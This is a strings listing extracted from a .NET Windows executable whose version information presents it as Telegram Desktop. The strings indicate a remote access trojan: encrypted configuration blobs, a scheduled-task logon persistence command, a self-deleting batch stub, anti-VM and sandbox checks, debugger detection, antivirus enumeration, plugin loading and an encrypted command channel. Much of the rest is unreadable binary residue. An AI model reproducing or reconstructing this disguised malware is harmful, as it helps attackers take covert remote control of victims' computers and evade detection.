!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
tbZSTXIIIlbZA
rFcAlrzrulHB
krGHVJclYQSTJB
WbyidoiEuMqOB
yoxoIhFSejyJEADYB
EvQAtFsehB
lmDsEZTFHDOfxkB
FMHqqaZUVfsrB
OKqHJPfQPwuB
RihnpYoMWZMFEqAC
pMWdDwfAvPfJC
FPpDTnBeBkXKC
iGgbKhhtNC
tbgroxIbOC
ywiAAMnHxkxbC
JQzoXVhmMjcC
siFvegeHUgC
qotebmGioTTjC
cHBkFDAuqC
WiAmJJWatC
kdecExRVAD
tfmlpGwfWKFD
MapNameToOID
get_FormatID
AzzNpgOocTLD
rYiArMvOmsSD
tmlicAPoeVD
dlPZYhYVRWYD
URWKcfQBefYD
aGYXnuOwIDqZD
FEoGrNHkZWahD
CsCLoQmDBSOQZuTXiD
bJCiHnXESNGE
MTANcjMFvSE
GdlQomxLUdRQGiE
QEepnrkjxqnE
qTevZKibGjVoE
gIVnJROGOGF
NkckLJrPpxGF
KGUinaTDzkfNF
WLwvVrbKvbuPVTF
EDhclXDHaoTXEoF
PYxUYwNrAhHqPqF
hLeJmTUPXMdEtF
HVPHTJCRWNZHG
kQjkArnjrkLG
qZcJdDRNbqXHaG
MpnTLPhIbG
xALToyjCOBoG
ExPTMkbmQFoG
LMcBpmOODqG
njvtORDkPufuG
CMLMrmbKvRrrH
BMRVOoqsTWsH
KxajJIQEgaRZpMSEI
get_ASCII
qsvtyHDVxGPVII
BXaRPnQQnMI
OZGHEbvjOI
jjMHAZantvPI
NqoctrecPqRI
rwMbuSPhPdI
PQjHvIUqczekI
lUfksjbWyUuI
TmVHQMEEifIJ
bIgMkbpQIbKKJ
yvhpZeavNeJ
BISuueSIMnJ
pVEyuUBOXoqtrJ
UEdKxMrTApLK
mlMHNvERCTK
GtFJyRKkbveK
sNdymIELisDL
ewbQsPlANIL
gWQfluEsEdCUL
DYODYYXYJmVL
nhCVZdkTdXnOYL
wwQaonYUliMufL
deXnfdshkTAkL
KqRaUlOexL
WgrEqOtaBzL
hFWYVqEdgXvIM
wonZUhnzCANgXM
VPOJrBQJfOMqeM
gIyAFYshyjM
CPbfizdKuuoM
gXnUaQSNxM
OlAZEReIVQNqFN
QqWaPdVGRvYSUN
UDQpGtQcVbN
TcTOLbCgAkbN
elNGAWXEqGfN
dHzSGgYLljN
System.IO
aiDiGeBxpqKO
mQfIziqeSbPMO
fAsyIlwqcOO
SITLPqCSvzvvO
XuRURjizEQRyO
SBTaJImHPALiNP
YavVtLmzwlOPyOP
YlSObQvGbISP
vTvTNvYMjXP
XVBXbuolfroIajP
sCyrLOFWoCQ
FulwCZacDdOQ
CEIOxYwqKyPQ
DCZXtdiVORQ
rSpVNEmcDlcUvIigQ
JoEeOKPKlTtvPoQ
WnznQDWhZRqQ
JCKiefIelKNBR
VfIzXvSSvnWLGR
HdthxTyZppGR
RcOZgfdwdfhcRR
gxNZxZBJZgPOVXR
EXpcfbGxHFTImR
oAQEAsYyawqR
LJNuSbvKMUZlAS
bruqxEPwJGOS
GGAYvDNJiRS
qJUNNaDsMbS
qyyjZpRdvjNcDFhS
RpzlJWXAAvuS
uuHEXnHzhzS
DOrJupyNqCT
EPbqTlVLTfceT
ZAMHtBrddPkT
lPdBrEuFOyqHU
SVKHYgWHQVU
luWqwCxStseU
BrBwkwbrfpsU
BQnGfSRJJqTvTtU
TVgAfoRAvU
wPjarIZjogxU
get_IV
set_IV
GenerateIV
JKMqQQErZV
hQuyMilYQtV
pZZnOQAQqwtV
VPNFNxzLtFDW
AOVWEqFwxlyEW
FeJtYcsusXIW
bfcoquCQQtLW
mVwQwVdFzNIEhOW
PqxHzElFKgPYW
ccsCZbVhwYW
NRRuODlMtaVOiW
zdLSlwHMnjW
KfixFYMgfHhxW
ryWXwkeejiDX
SpiPdbDhzPnGX
GuUbqGFUNlZX
JOWZIEGKhMdDGBdgX
KKpIgMRRqUfuKIuX
ivlwBEizyX
pcGFMncpoKzEbHEY
KrhUueYZoJmFvFY
GaubAvLmITnY
AdpUgBrlewPAZ
sfceafLclIZ
FXCrwEAWiuIZ
jrGHpTmWSVZ
ujfoosyGmNwnXZ
SllJjNOSYZ
NnYMmjfMPkRviZ
PwGjwNEjDstZ
JZPBfkYfgnTwZ
SxnECpLrLiOxZ
value__
UbhNwHoJixAa
ZRuliJTItUdXBa
bQqKVDKpsOa
JrHEXDaEVa
qnNLywrnahca
uDTSrGoWda
qHacZVHuJaQICzkpGga
WUMrGWdOLUha
iQFflnkxRpdia
yklzgOAhXaNla
IIfPpHfsRpMcssa
HCQqILNmbCb
kyKihMJgaNqRGb
mscorlib
enAnBREtIAlb
RFAbUabgOjZGmb
SxJAUfQBfOvqb
fZQFaxkFCUDc
dKYdOcFpuAmYc
YWJpMaPupYzhc
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
sEIGEQotxJaaCd
TIvUlQiHMd
EndRead
BeginRead
Thread
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
vGuIPWRJBhSPpd
crsUIxdpZCsd
xZnFjNviRMe
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
tlimTxjXDIee
DeleteSubKeyTree
get_Message
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
nRHjyPXYjsmUxe
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
DKjSKzHqAgqLf
fdhqbOGwTbf
uwJzexdBoBhnf
VENsNviiSGgAg
hMdjqeINBXnonBg
wlmklQewLMg
jTmHkNNQINg
AuLpEvRlQrTg
BwSUeazbWg
BIxVZVLLbg
MYpGRtYgCcg
OVWmWVtgtIkdg
DNDRnOzWrmifg
CryptoConfig
JdMZuboVmvmg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
LgUScPLZWXAh
YljZwaOjkBh
clkRKkMjICh
KSZWIeEWBDh
ViavVqXVIhyQLh
yNCAkDladGwUFCXh
aSwIqZbSeiELMYh
VywqVDVnknFfh
WIobWrKKvNNlh
EcGdZAAKGjIeoh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
oTRIhFZlWFi
QtiiBMRVfwrFi
jbNHTHwhLyUUi
hGFJDZaehHRmNXi
pnGuwYQtWFfei
vSWMndBlri
SxLyZOuGsLslQvi
baDHvOewFuaBj
whhNaNETTj
KPsCDdhpGbj
LziGVehAOugj
gYGKzXjZoj
VdzLtMjEtNrj
aoxPlOYBePZPk
apNdfYGQMopTk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
yIPklkqDAzDgk
JqGDZbbKgllk
xMbMPuWFzqk
nMviOCZVjrJrk
vxzgJJlrgAOl
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
oofHHCaNDOybl
kernel32.dll
user32.dll
ntdll.dll
rFhbmMkRhahMynl
PlDNZatYDzl
nfvAmOtyRDcEm
qdqAiRqukMm
yDIxSHUVPm
zpqJldaWam
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
BielxNRWxxztYgm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
MbbTMlckrrlm
UpTzhcThquIRkmm
Random
ZoFtLngajcRpm
ICryptoTransform
RpXjWFOLkysxm
aRwYvCwKZuEcEn
vxnBFLXVYBgKn
mJyDduADnQn
GKXnngClFcvbwoZn
ToBoolean
X509Chain
AppDomain
get_CurrentDomain
lAyTizQWDeIjn
MmUqowisYkAln
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
WwXxkScGvppn
AZslVQmtBhrn
SnRjShmlhwn
FQixwgiJBdHo
sMiRREyZQVUOo
NCJptWePCTSPo
xKdUpbNsZo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
lnjAOJwGio
qdFJOhKbXpLkTGPno
LPjdDJAmFzEZeno
syDORRNerDlKAeACp
aEAzQabkDp
DEJMvQibztFp
gkERgPjouFp
EZrxQhNrhLHiGp
BxXwWEUtqNKp
KQnqzakyRRNp
NdJRhgZWUCvmOp
oKBtnzXgtmRp
nBmQhMjbCMnZp
dnyJvMTOYdp
Microsoft.CSharp
PYkjshfUMXDNRRxrp
XsRoyPYkEcfsMDwp
XZeKSlOIzwp
rZkjidCEQgYmabxp
grdzYSTEkuJq
DYOucznaSq
IyKDJumJnWq
BtuAyARmVbohQWCdq
System.Linq
HgUuVQLuAMkpHr
RaetmJRCzZfRr
TrunNotInstallencr
QYCaTBeEMdr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
irjxkNpJhr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
LUVDqYvvPxCDs
yWVIGNkPaDs
bmLbMBssIZHZzFs
MRDfrhWOZlVYQQs
nDpGIMCmZs
AEjYHVJHJpLas
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
LdpSsuyOsis
vTzwOfnkOBls
njVmMerDhTBsIls
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
cAAWzSvmVFbups
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
ZoQFlNcGbUzs
edkWAdYYkECt
XwdMdhGnizkLt
gPpNigCCYfcDMt
igmURTxcTt
hXtvMBgmIsGYt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
aMUxuZdjBft
IAsyncResult
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
FggecNQVKsMNLu
vBVpxTnVPu
mzNIFhMHWpBcQu
KMDpRHMvLXjBWu
nIeWXKfYDJpScu
KMoEavwfrTlu
wjsLhRkKtupu
AgGeHKMgYYIv
lcHaowdsenSv
bHvAeNPRev
fixDFLZYqrev
xSpthAOLBGgv
JybzaiehmNhsv
YyXEKLGxqttzv
MdlQcjUhDLw
GetForegroundWindow
set_CreateNoWindow
ricfzPCydJx
dEUxfimrzZx
yJUjiHmomlfdx
AiawNQQtLVex
IIhmwADFXnkx
nUjQbdYWilx
iGsbKOZLVAAJAy
mGGpIZOSnJy
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
GjfmdAcdDTNzHjy
Assembly
AddressFamily
TvoungPpebCmy
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
CJgKqLzhHiFTeEvy
BHfIJKuYINCz
IqFNkXrbVaknFz
UgDSEHgGDYIz
SqacMBXQcz
YMJAsuRzgz
cMaaztaweIQdiljz
DyHrfnYNtOVnz
ZufVlJxzrz
RrDcoxuguqSyz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
O+IDATx
mHCC(j
k3;>BI
Bf\R:t,
+|0baP
47HZzz
i~1]a-
U8o^17
!"ej'f
zOTcp8AY
HFCiZL
iJ/E6'G
e-Dfad
aHt#U v
*n[WCc
JUL'[_O
|;[w$Ad(NY
g6gaR9
1L!0aLF
4bN%d4
H@AKDd"
hq9W.+g
gtW^]J>
o*AJiz
2HG6GZ
r6-,c^
NOXcGw
,|M7h,
K||cs3
M.?g|i
_7$UA/
GKd"vD
ZTz%e7
+QTDE=
[Tg*q2
2Q^WIQ
:,{Z[d_
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
SHA256
LhQV1rW5bzQ2a3T+iz64gpZpISxCc4eAZDsjjJiZA5XovjNklY5hfw4jVXZ2Y5qm6D2PQ4InCpCAtDFBKl5nOA==
ryMMEim8W4EwaX12eLXl3V3Wgm6jOPIp7gDjQwOtdvLjptpXQbRgrsbIksa8VBu3fNEbZtJELrFuDEVBh1Qq3g==
bAbwajS0uhE6w+sFfFlr2g7iXOnM//9xdqsq0D3apr2kFOxXhIl54tbzZnFyOnHzaxRZTHZJRleJ0vhLx5s9nQ==
u5H6JBpdUQXQw9YuIOHYcDS+/m7f4b53qIajbTcQ0TK5Kj1kGQyFp68AND85SsAa5buFt+HweimSoyE92Z+gkQ==
%AppData%
servic.exe
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
Telegram FZ-LLC
FileDescription
Telegram Desktop
FileVersion
4.1.1.0
InternalName
LegalCopyright
Copyright (C) 2014-2022
LegalTrademarks
OriginalFilename
ProductName
Telegram Desktop
ProductVersion
4.1.1.0
Assembly Version
4.1.1.0